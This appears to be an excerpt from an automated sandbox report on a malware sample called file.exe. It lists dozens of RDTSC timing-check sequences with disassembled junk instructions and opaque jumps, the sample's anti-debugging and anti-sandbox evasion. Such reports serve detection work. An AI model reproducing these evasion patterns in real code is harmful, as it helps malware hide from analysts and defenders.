              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933EB4 second address: 933EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934539 second address: 934559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F5A4D20AA04h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934559 second address: 93455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934633 second address: 934647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934647 second address: 934658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F5A4CBCDC66h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934658 second address: 934667 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934667 second address: 934676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934676 second address: 93467D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93467D second address: 934682 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B733 second address: 93B737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934755 second address: 934764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934877 second address: 9348A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add edx, dword ptr [ebp+122D1D83h] 0x0000000f push 00000004h 0x00000011 mov dword ptr [ebp+122D2561h], ecx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5A4D20A9FEh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9348A1 second address: 9348A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934BE0 second address: 934BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934BEF second address: 934C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A4CBCDC6Fh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934C05 second address: 934C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5A4D20A9F8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 pushad 0x00000023 jc 00007F5A4D20A9F6h 0x00000029 jmp 00007F5A4D20AA08h 0x0000002e popad 0x0000002f sub dword ptr [ebp+122D1E0Bh], esi 0x00000035 mov edi, dword ptr [ebp+122D3B82h] 0x0000003b push 0000001Eh 0x0000003d sub dword ptr [ebp+122D1E1Ah], esi 0x00000043 add dword ptr [ebp+122D1DDBh], esi 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c je 00007F5A4D20AA07h 0x00000052 jmp 00007F5A4D20AA01h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E634 second address: 93E63A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D9F9 second address: 94DAA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a js 00007F5A4D20A9FDh 0x00000010 jno 00007F5A4D20A9F7h 0x00000016 adc ebx, 51D1EE66h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D1CE5h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 xor ebx, dword ptr [ebp+122D2A03h] 0x00000036 mov eax, dword ptr [ebp+122D1755h] 0x0000003c mov dword ptr [ebp+122D2E51h], edx 0x00000042 push FFFFFFFFh 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F5A4D20A9F8h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jnc 00007F5A4D20A9FCh 0x00000064 nop 0x00000065 pushad 0x00000066 jmp 00007F5A4D20AA01h 0x0000006b jmp 00007F5A4D20AA05h 0x00000070 popad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push ebx 0x00000077 pop ebx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94DAA6 second address: 94DAC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E71E second address: 93E728 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A4D20A9FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94982B second address: 94982F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94566B second address: 945671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945671 second address: 945676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94473D second address: 944741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943562 second address: 943568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945676 second address: 94567B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F5E2 second address: 93F5E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943568 second address: 94356C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F5E6 second address: 93F5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934FE3 second address: 934FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934FE7 second address: 934FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934FED second address: 935050 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F5A4D20A9F6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F5A4D20A9FEh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a js 00007F5A4D20A9F6h 0x00000020 popad 0x00000021 jnc 00007F5A4D20A9FCh 0x00000027 popad 0x00000028 mov eax, dword ptr [eax] 0x0000002a push edi 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e jmp 00007F5A4D20A9FBh 0x00000033 popad 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 pushad 0x0000003a jg 00007F5A4D20A9FCh 0x00000040 jo 00007F5A4D20A9FCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9350B2 second address: 9350D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9350D1 second address: 9350D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9350D5 second address: 9350E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5A4CBCDC6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9350E3 second address: 935145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov di, 2969h 0x0000000a lea eax, dword ptr [ebp+1248BBB1h] 0x00000010 and cx, 6FDAh 0x00000015 push eax 0x00000016 jmp 00007F5A4D20AA05h 0x0000001b mov dword ptr [esp], eax 0x0000001e xor dh, 00000020h 0x00000021 lea eax, dword ptr [ebp+1248BB6Dh] 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F5A4D20A9F8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov di, ax 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 jns 00007F5A4D20A9F8h 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935145 second address: 91CFC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5A4CBCDC66h 0x00000009 jmp 00007F5A4CBCDC6Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F5A4CBCDC79h 0x00000017 nop 0x00000018 sub dword ptr [ebp+122D2362h], edx 0x0000001e call dword ptr [ebp+122D2887h] 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jbe 00007F5A4CBCDC66h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91CFC9 second address: 91CFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9696A1 second address: 9696B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969885 second address: 969889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969B31 second address: 969B6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jmp 00007F5A4CBCDC75h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jl 00007F5A4CBCDC66h 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F5A4CBCDC6Ch 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007F5A4CBCDC66h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969B6E second address: 969B76 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969B76 second address: 969B80 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5A4CBCDC6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 969F97 second address: 969F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4534 second address: 8F453A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F453A second address: 8F4540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4540 second address: 8F4560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F5A4CBCDC77h 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4560 second address: 8F4565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972ACC second address: 972AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972AD0 second address: 972AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5A4D20A9F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972AE0 second address: 972AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972AE4 second address: 972AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972AF0 second address: 972AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972AF4 second address: 972B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5A4D20AA03h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972B11 second address: 972B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972B1B second address: 972B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973523 second address: 973529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973529 second address: 97352F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973651 second address: 973657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973657 second address: 973668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EDC second address: 973EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EE0 second address: 973EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EE4 second address: 973EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5A4CBCDC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5A4CBCDC6Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973EFD second address: 973F0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5A4D20A9F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973F0A second address: 973F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC78h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F5A4CBCDC6Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727AD second address: 9727F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jno 00007F5A4D20A9F8h 0x00000011 jl 00007F5A4D20AA12h 0x00000017 jmp 00007F5A4D20AA06h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727F1 second address: 972813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC6Bh 0x00000009 pushad 0x0000000a jmp 00007F5A4CBCDC70h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979D1E second address: 979D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA06h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979EBB second address: 979ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A4CBCDC77h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979ED9 second address: 979EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979EDF second address: 979F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5A4CBCDC6Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5A4CBCDC66h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F01 second address: 979F0B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5A4D20A9F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F0B second address: 979F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F11 second address: 979F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979F16 second address: 979F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A516 second address: 97A540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F5A4D20A9FEh 0x0000000f pushad 0x00000010 jnl 00007F5A4D20A9F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A540 second address: 97A546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97A98B second address: 97A9AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF28 second address: 97DF2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF2D second address: 97DF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA03h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F5A4D20A9F6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF4D second address: 97DF57 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5A4CBCDC66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF57 second address: 97DF63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF63 second address: 97DF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5A4CBCDC66h 0x0000000a jmp 00007F5A4CBCDC71h 0x0000000f jmp 00007F5A4CBCDC75h 0x00000014 popad 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DF9C second address: 97DFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D851 second address: 97D85B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5A4CBCDC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98049C second address: 9804AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5A4D20A9F6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9804AB second address: 9804AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9804AF second address: 9804B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97FFB9 second address: 97FFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
